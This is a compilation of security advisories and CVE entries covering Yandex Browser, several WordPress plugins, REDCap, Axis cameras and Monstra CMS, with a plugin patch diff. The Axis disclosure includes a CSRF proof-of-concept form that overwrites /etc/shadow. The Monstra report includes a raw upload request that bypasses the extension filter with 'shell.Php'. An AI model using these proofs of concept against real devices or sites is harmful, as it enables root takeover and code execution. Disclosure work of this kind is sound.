Local privilege vulnerability in Yandex Browser for Windows prior to 22.3.3.801 allows a local, low privileged, attacker to execute arbitary code with the SYSTEM privileges through manipulating temporary files in directory with insecure permissions during Yandex Browser update process.

Security WiFi bypass in Yandex Browser from version 15.10 to 15.12 allows remote attacker to sniff traffic in open or WEP-protected wi-fi networks despite of special security mechanism is enabled.

Yandex Protect Anti-phishing warning in Yandex Browser for desktop from version 15.12.0 to 16.2 could be used by remote attacker for brute-forcing passwords from important web-resource with special JavaScript.

Yandex Protect Anti-phishing warning in Yandex Browser for desktop from version 16.7 to 16.9 could be used by remote attacker for brute-forcing passwords from important web-resource with special JavaScript.

CSRF of synchronization form in Yandex Browser for desktop before version 16.6 could be used by remote attacker to steal saved data in browser profile.

XSS in Yandex Browser BookReader in Yandex browser for desktop for versions before 16.6. could be used by remote attacker for evaluation arbitrary javascript code.

XSS in Yandex Browser Translator in Yandex browser for desktop for versions from 15.12 to 16.2 could be used by remote attacker for evaluation arbitrary javascript code.

Yandex Browser for iOS before 16.10.0.2357 does not properly restrict processing of facetime:// URLs, which allows remote attackers to initiate facetime-call without user's approval and obtain video and audio data from a device via a crafted web site.

Yandex Browser for desktop before 17.1.1.227 does not show Protect (similar to Safebrowsing in Chromium) warnings in web-sites with special content-type, which could be used by remote attacker for prevention Protect warning on own malicious web-site.

Yandex Browser before 16.9.0 allows remote attackers to spoof the address bar via window.open.

Race condition issue in Yandex Browser for Android before 17.4.0.16 allowed a remote attacker to potentially exploit memory corruption via a crafted HTML page.

Yandex Browser installer for Desktop before 17.4.1 has a DLL Hijacking Vulnerability because an untrusted search path is used for dnsapi.dll, winmm.dll, ntmarta.dll, cryptbase.dll or profapi.dll.

Yandex Browser before 20.8.4 allows remote attackers to spoof the address bar.

Kirtikumar Anandrao Ramchandani

Yandex Browser Lite before 20.10.0 allows remote attackers to spoof the address bar.

Kirtikumar Anandrao Ramchandani

Yandex Browser Lite for Android before 21.1.0 allows remote attackers to spoof the address bar.

Kirtikumar Anandrao Ramchandani

Yandex Browser Lite for Android prior to version 21.1.0 allows remote attackers to cause a denial of service.

Kirtikumar Anandrao Ramchandani

Yandex Browser for Android prior to version 21.3.0 allows remote attackers to perform IDN homograph attack.

Kirtikumar Anandrao Ramchandani

An elevation of privilege vulnerability exists in Yandex Browser prior to 22.5.0.826.

An elevation of privilege vulnerability exists in Yandex Browser prior to 21.9.0.390.

An elevation of privilege vulnerability exists in Yandex Browser prior to 22.3.3.801.

An elevation of privilege vulnerability exists in Yandex Browser prior to 22.3.3.684.

CVE-2022-28226: Яндекс Охота в Браузере

Cross-Site Request Forgery (CSRF) vulnerability in Photo Gallery by Supsystic plugin <= 1.15.5 at WordPress allows changing the plugin settings.

 Verified

 Not fixed

**5.4**

CVSS 3.1 score Medium severity

Monitoring Coming soon

Vulnerable versions

<= 1.15.5

PSID 

e788749fb051

Classification 

Cross Site Request Forgery (CSRF)

OWASP Top 10 

A5: Broken Access Control

Publicly disclosed

2022-06-15

**Details**

Cross-Site Request Forgery (CSRF) leading to Plugin Settings Change discovered by Rasi Afeef (Patchstack Alliance) in WordPress Photo Gallery by Supsystic plugin (versions <= 1.15.5).

**Solution**

No patched version available. No reply from the vendor.

**References**

CVE-2021-36891: WordPress Photo Gallery by Supsystic plugin <= 1.15.5 - Cross-Site Request Forgery (CSRF) leading to Plugin Settings Change - Patchstack

Multiple Cross-Site Request Forgery (CSRF) vulnerabilities in Admin Management Xtended plugin <= 2.4.4 at WordPress.



Expand Up @@ -8,7 +8,7 @@ \*/  
/\* \* Copyright 2008-2020 Oliver Schlöbe (email : scripts@schloebe.de) \* Copyright 2008-2022 Oliver Schlöbe (email : scripts@schloebe.de) \* \* This program is free software; you can redistribute it and/or modify \* it under the terms of the GNU General Public License as published by Expand Down Expand Up @@ -71,6 +71,8 @@ function return\_function($output) { \*/ function ame\_ajax\_save\_mediadesc() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( $\_POST\['postid'\] ); $new\_mediadesc = $\_POST\['new\_mediadesc'\];  
Expand All @@ -96,6 +98,8 @@ function ame\_ajax\_save\_mediadesc() { \*/ function ame\_ajax\_set\_commentstatus() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( $\_POST\['postid'\] ); $q\_status = intval( $\_POST\['comment\_status'\] );  
Expand Down Expand Up @@ -127,6 +131,7 @@ function ame\_ajax\_set\_commentstatus() { \*/ function ame\_get\_pageorder() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
if( !current\_user\_can( 'edit\_pages' ) ) { die(); Expand Down Expand Up @@ -155,6 +160,8 @@ function ame\_get\_pageorder() { \*/ function ame\_ajax\_save\_tags() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( $\_POST\['postid'\] ); $ame\_tags = $\_POST\['new\_tags'\];  
Expand Down Expand Up @@ -200,6 +207,8 @@ function ame\_ajax\_save\_tags() { \*/ function ame\_ajax\_get\_categories() { global $wpdb, $post; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$ame\_id = intval( $\_POST\['postid'\] );  
if( !current\_user\_can( 'edit\_post', $ame\_id ) ) { Expand Down Expand Up @@ -232,6 +241,8 @@ function ame\_ajax\_get\_categories() { \*/ function ame\_ajax\_save\_categories() { global $wpdb, $post; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( $\_POST\['postid'\] ); $ame\_cats = $\_POST\['ame\_cats'\];  
Expand Down Expand Up @@ -272,6 +283,8 @@ function ame\_ajax\_save\_categories() { \*/ function ame\_toggle\_showinvisposts() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$status = intval( $\_POST\['status'\] );  
update\_option( "ame\_toggle\_showinvisposts", $status ); Expand Down Expand Up @@ -300,6 +313,8 @@ function ame\_ajax\_toggle\_imageset() { \*/ function ame\_toggle\_orderoptions() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$status = intval( $\_POST\['status'\] );  
update\_option( "ame\_show\_orderoptions", $status ); Expand All @@ -314,6 +329,8 @@ function ame\_toggle\_orderoptions() { \*/ function ame\_slug\_edit() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( $\_POST\['category\_id'\] ); if( is\_string( $\_POST\['posttype'\] ) ) $posttype = $\_POST\['posttype'\];  
Expand Down Expand Up @@ -342,6 +359,8 @@ function ame\_slug\_edit() { \*/ function ame\_author\_edit() { global $wpdb, $current\_user; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( $\_POST\['post\_id'\] );  
if( !current\_user\_can( 'edit\_post', $postid ) ) { Expand Down Expand Up @@ -396,6 +415,8 @@ function ame\_author\_edit() { \*/ function ame\_save\_order() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( $\_POST\['category\_id'\] ); $neworderid = intval( $\_POST\['new\_orderid'\] );  
Expand All @@ -416,6 +437,8 @@ function ame\_save\_order() { \*/ function ame\_save\_slug() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( $\_POST\['category\_id'\] );  
if( !current\_user\_can( 'edit\_post', $postid ) ) { Expand Down Expand Up @@ -451,6 +474,8 @@ function ame\_save\_slug() { \*/ function ame\_save\_author() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( $\_POST\['category\_id'\] );  
if( !current\_user\_can( 'edit\_post', $postid ) ) { Expand Down Expand Up @@ -480,6 +505,8 @@ function ame\_save\_author() { \*/ function ame\_save\_title() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( $\_POST\['category\_id'\] ); $new\_title = $\_POST\['new\_title'\]; $new\_title = apply\_filters( 'the\_title', $new\_title ); Expand All @@ -504,6 +531,8 @@ function ame\_save\_title() { \*/ function ame\_set\_date() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( substr( $\_POST\['category\_id'\], 10, 5 ) );  
if( !current\_user\_can( 'edit\_post', $postid ) ) { Expand Down Expand Up @@ -542,6 +571,8 @@ function ame\_set\_date() { \*/ function ame\_toggle\_visibility() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( $\_POST\['category\_id'\] );  
if( !current\_user\_can( 'edit\_post', $postid ) ) { Expand Down Expand Up @@ -584,6 +615,8 @@ function ame\_toggle\_visibility() { \*/ function ame\_toggle\_sticky() { global $wpdb; check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
$postid = intval( $\_POST\['post\_id'\] );  
if( !current\_user\_can( 'edit\_post', $postid ) ) { Expand Down Expand Up @@ -612,6 +645,8 @@ function ame\_toggle\_sticky() { \* @link http://plugins.trac.wordpress.org/browser/exclude-pages/trunk/exclude\_pages.php#L162 \*/ function ame\_toggle\_excludestatus() { check\_ajax\_referer( 'ame\_ajax\_validation', 'security' );  
if( !current\_user\_can( 'edit\_pages' ) ) { die(); return; Expand Down Expand Up @@ -955,9 +990,20 @@ function ame\_enqueue\_stuff\_edit() { wp\_enqueue\_script( 'ame\_gui-modificators', AME\_PLUGINFULLURL . "js/gui-modificators.js", array( 'sack' ), AME\_VERSION ); wp\_enqueue\_script( 'ame\_miscscripts', AME\_PLUGINFULLURL . "js/functions.js", array( 'sack' ), AME\_VERSION ); wp\_register\_script( 'ame\_miscscripts', AME\_PLUGINFULLURL . "js/functions.js", array( 'jquery', 'sack' ), AME\_VERSION ); wp\_enqueue\_script( 'ame\_miscscripts' ); wp\_localize\_script( 'ame\_miscscripts', 'ameAjaxSec', array( 'ajaxnonce' => wp\_create\_nonce( 'ame\_ajax\_validation' ) ) ); }  
add\_action( 'admin\_head', 'ame\_css\_admin\_header' ); Expand Down Expand Up @@ -1000,9 +1046,20 @@ function ame\_enqueue\_stuff\_linkmanager() { wp\_enqueue\_script( 'ame\_gui-modificators', AME\_PLUGINFULLURL . "js/gui-modificators.js", array( 'sack' ), AME\_VERSION ); wp\_enqueue\_script( 'ame\_miscscripts', AME\_PLUGINFULLURL . "js/functions.js", array( 'sack' ), AME\_VERSION ); wp\_register\_script( 'ame\_miscscripts', AME\_PLUGINFULLURL . "js/functions.js", array( 'jquery', 'sack' ), AME\_VERSION ); wp\_enqueue\_script( 'ame\_miscscripts' ); wp\_localize\_script( 'ame\_miscscripts', 'ameAjaxSec', array( 'ajaxnonce' => wp\_create\_nonce( 'ame\_ajax\_validation' ) ) ); }  
add\_action( 'admin\_print\_scripts', 'ame\_js\_admin\_header' ); Expand All @@ -1015,9 +1072,20 @@ function ame\_enqueue\_stuff\_upload() { wp\_enqueue\_script( 'ame\_gui-modificators', AME\_PLUGINFULLURL . "js/gui-modificators.js", array( 'sack' ), AME\_VERSION ); wp\_enqueue\_script( 'ame\_miscscripts', AME\_PLUGINFULLURL . "js/functions.js", array( 'sack' ), AME\_VERSION ); wp\_register\_script( 'ame\_miscscripts', AME\_PLUGINFULLURL . "js/functions.js", array( 'jquery', 'sack' ), AME\_VERSION ); wp\_enqueue\_script( 'ame\_miscscripts' ); wp\_localize\_script( 'ame\_miscscripts', 'ameAjaxSec', array( 'ajaxnonce' => wp\_create\_nonce( 'ame\_ajax\_validation' ) ) ); }  
add\_action( 'admin\_print\_scripts', 'ame\_js\_admin\_header' ); Expand Down

CVE-2022-29450: 2.4.5 Release · oliverschloebe/admin-management-xtended@f94732d

Multiple Cross-Site Request Forgery (CSRF) vulnerabilities in Admin Management Xtended plugin <= 2.4.4 at WordPress.

 Fixed

**5.4**

CVSS 3.1 score Medium severity

Monitoring Coming soon

Vulnerable versions

<= 2.4.4

PSID 

bbb55cabc55b

Classification 

Cross Site Request Forgery (CSRF)

OWASP Top 10 

A5: Broken Access Control

Publicly disclosed

2022-05-27

**Details**

Multiple Cross-Site Request Forgery (CSRF) vulnerabilities were discovered by Nguy Minh Tuan (Patchstack Alliance) in the WordPress Admin Management Xtended plugin (versions <= 2.4.4).

**Solution**

Update the WordPress Admin Management Xtended plugin to the latest available version (at least 2.4.5).

**References**

CVE-2022-29450 Plugin page

CVE-2022-29450: WordPress Admin Management Xtended plugin <= 2.4.4 - Multiple Cross-Site Request Forgery (CSRF) vulnerabilities - Patchstack

A Stored Cross-Site Scripting (XSS) vulnerability was discovered in ProjectGeneral/edit_project_settings.php in REDCap 12.0.11. This issue allows any user with project management permissions to inject arbitrary code into the project title (app_title) field when editing an existing project. The payload is then reflected within the title tag of the page.

CVE-2022-24127: REDCap Change Log - Eastern Virginia Medical School (EVMS), Norfolk, Hampton Roads

A vulnerability has been found in AXIS P1204, P3225, P3367, M3045, M3005 and M3007 and classified as problematic. This vulnerability affects unknown code of the component Web Interface. The manipulation leads to improper access controls. The attack can be initiated remotely. It is recommended to upgrade the affected component.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives**

_From_: David Wearing <wearing () google com>  
_Date_: Thu, 16 Mar 2017 16:47:27 +1100  

Introduction

============

Vulnerabilities were identified in the camera software by Axis.  These were
discovered during a black box assessment and therefore the vulnerability
list should not be considered exhaustive; observations suggest that it is
likely that further vulnerabilities exist.

Affected Software And Versions

==============================


Model P1204, software versions <= 5.50.4

Model P3225, software versions <= 6.30.1

Model P3367, software versions <= 6.10.1.2

Model M3045, software versions <= 6.15.4.1

Model M3005, software versions <= 5.50.5.7

Model M3007, software versions <= 6.30.1.1

CVE

===

No CVEs have been assigned to these vulnerabilities.


Vulnerability Overview

======================

1. Axis01: No cross-site request forgery protections

2. Axis02: Bypass manual checks for XSS

3. Axis03: Web services run as root

4. Axis04: Script editor function allows for arbitrary write as root on
successful CSRF attack

5. Axis05: root setuid .CGI scripts and binaries present

6. Axis06: Inability to disable the http interface

Vulnerability Details

=====================

---------------------------------------------

1. Axis01: No cross-site request forgery protections

---------------------------------------------

Axis software does not have any cross-site request forgery protection
within the management interface. Axis provide guidance on risk mitigation
for CSRF only.

https://www.axis.com/files/faq/Advisory\_Cross-Site\_Request\_Forgery.pdf

--------------------------------------------------

2. Axis02: Bypass manual checks for XSS

--------------------------------------------------

Axis software on the camera has client-side JavaScript to try and remove
XSS payloads. No server-side security checks are present. Viewers or lower
privileged users of cameras exposed to the internet or corporate networks
may be able to store persistent XSS payloads.

Example of code in language\_incl.js used to detect and remove malicious
javaScript shown below:

if( data.toLowerCase().indexOf(\\"<script\\") != -1 ||
data.toLowerCase().indexOf(\\"</script\\") != -1 )


-----------------------------------------------

3. Axis03: Web service runs as root

-----------------------------------------------

The versions of Axis software tested have a BOA server (boa) running as
root. BOA is an ancient web server and no longer maintained since approx.
2005. Fuzzing of the process using off-the-shelf fuzzers result in crashes
that have not yet been investigated further.

Axis software versions >5.70 have replaced BOA with Apache.


-----------------------------------------------

4. Axis04: Script editor function allows for arbitrary write as root on
successful CSRF attack

-----------------------------------------------

A script editor function “/admin-bin/editcgi.cgi” can be used to write as
root to the device, due to Axis01 lack of CSRF protection, this can be
exploited to write over /etc/shadow and obtain root access to the device,
as well as backdoor the device.

Proof of concept to overwrite /etc/shadow file:

<body>
<form action="https://<ip-of-axis-camera|hostname>/admin-bin/editcgi.cgi?file=/etc/shadow"
method="POST" >
<input type="hidden" name="save&#95;file" value="&#47;etc&#47;shadow" />
<input type="hidden" name="mode" value="0100600" />
<input type="hidden" name="convert&#95;crlf&#95;to&#95;lf" value="on" />
<input type="hidden" name="content" value="#####INPUT HTML ENCODED SHADOW
HERE##### " />
<input type="submit" value="Submit request" />
</form>
</body>

-----------------------------------------------

5. Axis05: root setuid .CGI scripts and binaries present

-----------------------------------------------

Multiple root setuid .CGI scripts and binaries are present. The CGI scripts
manage web session temp files,group memberships and functionality of the
camera. Exploitable vulnerabilities in any will provide root access to the
camera.

E.g /axis-cgi/admin/param.cgi & /axis-cgi/admin/pwdgrp.cgi which allows for
changing user and group passwords.

-----------------------------------------------

6. Axis06: Inability to disable the HTTP interface

-----------------------------------------------

No option existed in Axis software to disable the HTTP interface. The web
server will always listen on all network interfaces of the camera, which
makes these cameras trivial to find on the internet e.g. using Shodan.

E.g port 80 is listening and /httpDisabled.shtml is always accessible.

Axis advise to move the web server listening port to another port.

Mitigation

==========

Axis released zero advisories related to the issues reported here.

Axis recommends following their hardening guide available on:
https://www.axis.com/mu/en/support/product-security

For the vulnerabilities related to Axis02, Axis03 and Axis06 Axis has
recommended to upgrade Axis software to versions >5.70 or use the new Axis
platform with >7.10 versions. Versions other than those listed here have
not been tested to confirm these vulnerabilities have been fixed.

Author

======

The vulnerabilities were discovered by David Wearing from Google Security
Team.

Timeline

========

2016/11/24 - Security report sent to Axis with 90 day disclosure deadline
(2017/02/24).

2016/12/02 - Axis acknowledges report and starts working on the issues.

2016/12/06 - Pinged for patch ETA.

2016/12/09 - Pinged for patch ETA.

2017/01/11 - Pinged for patch ETA.

2017/01/12 - Response from Axis Security listing multiple issues as having
been fixed in the new firmware versions. Redesign of CGI scripts to be
interfaces confirmed.

2017/01/25 - Send query regarding the lack of CSRF protections and if
changes to handling of XSS was to occur.

2017/02/28 - Request to Axis on any advice or mitigations they want to
include in the post.

2017/03/02 - Pinged Axis.

2017/03/02 - Response from Axis including advice on mitigation of CSRF.

2017/03/05 - Review of mitigations provided to Axis

2017/03/10 - Discussions with Axis on post.

2017/03/15 - Public disclosure.

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

**Current thread:**

*   **Axis Camera Multiple Vulnerabilities** _David Wearing (Mar 16)_

CVE-2017-20050: Full Disclosure: Axis Camera Multiple Vulnerabilities

Monstra 3.0.4 does not filter the case of php, which leads to an unrestricted file upload vulnerability.

**Brief of this vulnerability**

The Monstra 3.0.4 source code does not filter the case of php, which leads to an unrestricted file upload vulnerability.

**Test Environment**

    Apache/2.4.41 (Ubuntu20.04)
    PHP 7.4.3
    

**Affect version****POC**

    POST /monstra/admin/index.php?id=filesmanager&path=uploads/ HTTP/1.1
    Host: localhost:80
    Content-Length: 442
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost:65003
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryD6KF8q8SlXAspgP7
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost:65003/monstra/admin/index.php?id=filesmanager&path=uploads/
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: PHPSESSID=nlofifites91aq2tsi1s520298
    Connection: close
    
    ------WebKitFormBoundaryD6KF8q8SlXAspgP7
    Content-Disposition: form-data; name="csrf"
    
    8ff9a93b1f09f4dfa18e06c201b7355e602ea9ce
    ------WebKitFormBoundaryD6KF8q8SlXAspgP7
    Content-Disposition: form-data; name="file"; filename="shell.Php"
    Content-Type: text/plain
    
    <?php echo "This is a test";?>
    ------WebKitFormBoundaryD6KF8q8SlXAspgP7
    Content-Disposition: form-data; name="upload_file"
    
    上传
    ------WebKitFormBoundaryD6KF8q8SlXAspgP7--
    

  
Execute successfully  

**Reason of This Vulnerability**

$_FILES['file']['name'] in the Upload file module does not check whether the file extension is case,Vulnerability file：/plugins/box/filesmanager/filesmanager.admin.php

            // Upload file
            // -------------------------------------
            if (Request::post('upload_file')) {
    
                if (Security::check(Request::post('csrf'))) {
    
                    $error = false;
                    if ($_FILES['file']) {
                        if ( ! in_array(File::ext($_FILES['file']['name']), $forbidden_types)) {
                            $filepath = $files_path.Security::safeName(basename($_FILES['file']['name'], File::ext($_FILES['file']['name'])), null, false).'.'.File::ext($_FILES['file']['name']);
                            $uploaded = move_uploaded_file($_FILES['file']['tmp_name'], $filepath);
                            if ($uploaded !== false && is_file($filepath)) {
                                Notification::set('success', __('File was uploaded', 'filesmanager'));
                            } else {
                                $error = 'File was not uploaded';
                            }
                        } else {
                            $error = 'Forbidden file type';
                        }
                    } else {
                        $error = 'File was not uploaded';
                    }
    
                    if ($error) {
                        Notification::set('error', __($error, 'filesmanager'));
                    }
    
                    if (Request::post('dragndrop')) {
                        Request::shutdown();
                    } else {
                        Request::redirect($site_url.'/admin/index.php?id=filesmanager&path='.$path);
                    }
                } else { die('Request was denied because it contained an invalid security token. Please refresh the page and try again.'); }
            }
    

**Repair suggestions**

Add case verification at $\_FILES\['file'\]\['name'\], as follows:

            // Upload file
            // -------------------------------------
            if (Request::post('upload_file')) {
    
                if (Security::check(Request::post('csrf'))) {
    
                    $error = false;
                    if ($_FILES['file']) {
    					$_FILES['file']['name']=strtolower($_FILES['file']['name']);  //Change uppercase to lowercase
                        if ( ! in_array(File::ext($_FILES['file']['name']), $forbidden_types)) {
                            $filepath = $files_path.Security::safeName(basename($_FILES['file']['name'], File::ext($_FILES['file']['name'])), null, false).'.'.File::ext($_FILES['file']['name']);
                            $uploaded = move_uploaded_file($_FILES['file']['tmp_name'], $filepath);
                            if ($uploaded !== false && is_file($filepath)) {
                                Notification::set('success', __('File was uploaded', 'filesmanager'));
                            } else {
                                $error = 'File was not uploaded';
                            }
                        } else {
                            $error = 'Forbidden file type';
                        }
                    } else {
                        $error = 'File was not uploaded';
                    }
    
                    if ($error) {
                        Notification::set('error', __($error, 'filesmanager'));
                    }
    
                    if (Request::post('dragndrop')) {
                        Request::shutdown();
                    } else {
                        Request::redirect($site_url.'/admin/index.php?id=filesmanager&path='.$path);
                    }
                } else { die('Request was denied because it contained an invalid security token. Please refresh the page and try again.'); }
            }

CVE-2021-40940: Monstra 3.0.4 case without filtering leads to unrestricted file upload vulnerability · Issue #471 · monstra-cms/monstra

Cross-Site Request Forgery (CSRF) vulnerability in API KEY for Google Maps plugin <= 1.2.1 at WordPress leading to Google Maps API key update.

 Verified

 Fixed

**5.4**

CVSS 3.1 score Medium severity

Monitoring Coming soon

PSID 

2d3ab1d81ae9

Classification 

Cross Site Request Forgery (CSRF)

OWASP Top 10 

A5: Broken Access Control

Publicly disclosed

2022-06-08

**Details**

CSRF vulnerability leading to Google Maps API key update discovered by Rasi Afeef (Patchstack Alliance) in WordPress API KEY for Google Maps plugin (versions <= 1.2.1).

**Solution**

Update the WordPress API KEY for Google Maps plugin to the latest available version (at least 1.2.2).

**References**

Changeset

CVE-2022-29453: WordPress API KEY for Google Maps plugin <= 1.2.1 - CSRF vulnerability leading to Google Maps API key update - Patchstack

Cross-Site Request Forgery (CSRF) vulnerability in Image Slider by NextCode plugin <= 1.1.2 at WordPress allows deleting slides.

 Not fixed

**5.4**

CVSS 3.1 score Medium severity

Monitoring Coming soon

Software

Image Slider by NextCode

Vulnerable versions

<= 1.1.2

PSID 

8f6d0a17dc52

Classification 

Cross Site Request Forgery (CSRF)

OWASP Top 10 

A5: Broken Access Control

Publicly disclosed

2022-05-26

**Details**

Slider Deletion via Cross-Site Request Forgery (CSRF) vulnerability discovered by Ngo Van Thien (Patchstack Alliance) in WordPress Image Slider by NextCode plugin (versions <= 1.1.2).

**Solution**

Deactivate and delete. This plugin has been closed as of May 20, 2022 and is not available for download. This closure is temporary, pending a full review.

**References**

CVE-2022-29439 Plugin page

CVE-2022-29439: WordPress Image Slider by NextCode plugin <= 1.1.2 - Slider Deletion via Cross-Site Request Forgery (CSRF) vulnerability - Patchstack

Multiple Cross-Site Request Forgery (CSRF) vulnerabilities in Image Slider by NextCode plugin <= 1.1.2 at WordPress.

 Not fixed

**5.4**

CVSS 3.1 score Medium severity

Monitoring Coming soon

Software

Image Slider by NextCode

Vulnerable versions

<= 1.1.2

PSID 

298a34c5dadc

Classification 

Cross Site Request Forgery (CSRF)

OWASP Top 10 

A5: Broken Access Control

Publicly disclosed

2022-05-26

**Details**

Multiple Cross-Site Request Forgery (CSRF) vulnerabilities were discovered by BEE-K (Patchstack) in the WordPress Image Slider by NextCode plugin (versions <= 1.1.2).

**Solution**

Deactivate and delete. This plugin has been closed as of May 20, 2022 and is not available for download. This closure is temporary, pending a full review.

**References**

CVE-2022-29437 Plugin page

Tag

#csrf